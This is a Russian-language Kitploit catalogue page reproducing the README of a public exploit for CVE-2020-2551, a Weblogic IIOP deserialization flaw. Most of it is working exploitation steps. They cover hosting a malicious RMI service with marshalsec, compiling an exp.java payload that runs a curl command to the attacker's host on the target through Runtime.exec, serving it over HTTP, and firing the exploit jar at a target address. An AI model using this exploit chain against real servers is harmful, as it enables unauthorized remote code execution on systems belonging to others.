Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-2551 — Weblogic IIOP CVE-2020-2551 | Kitploit
Инструменты/GitHubGitHub/y4er/cve-2020-2551
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийКомандование и УправлениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHuby4er/cve-2020-2551

CVE-2020-2551

Weblogic IIOP CVE-2020-2551

Репозиторий
336786 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-2551

Weblogic IIOP десериализация

Тестовая среда

Weblogic10.3.6+jdk1.6

Запакованный jar-файл Код извлечения: a6ob

Эксплуатация уязвимости

Скачайте jar-файл, затем с помощью marshalsec поднимите вредоносный RMI-сервис, локально скомпилируйте exp.java

root@kitploit:~
package payload;

import java.io.IOException;

public class exp {

    public exp() {
        String cmd = "curl http://172.16.1.1/success";
        try {
            Runtime.getRuntime().exec(cmd).getInputStream();
        } catch (IOException e) {
            e.printStackTrace();
        }
    }
}

Постарайтесь компилировать с той же версией JDK и зависимостями (wlfullclient.jar), что и Weblogic Затем локально поднимите веб-сервер

root@kitploit:~
python -m http.server --bind 0.0.0.0 80

Запустите jar-файл из командной строки

root@kitploit:~
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp

Фактический результат показан на рисунке image

Известные проблемы

Многие пользователи сообщают, что воспроизвести не удалось, прочитав некоторые статьи в интернете, выяснилось, что у IIOP есть проблема с режимом NAT. Сегодня нашлась информация на https://xz.aliyun.com/t/7498, переходите по ссылке.

Ссылки

https://y4er.com/post/weblogic-cve-2020-2551/

Скачать инструмент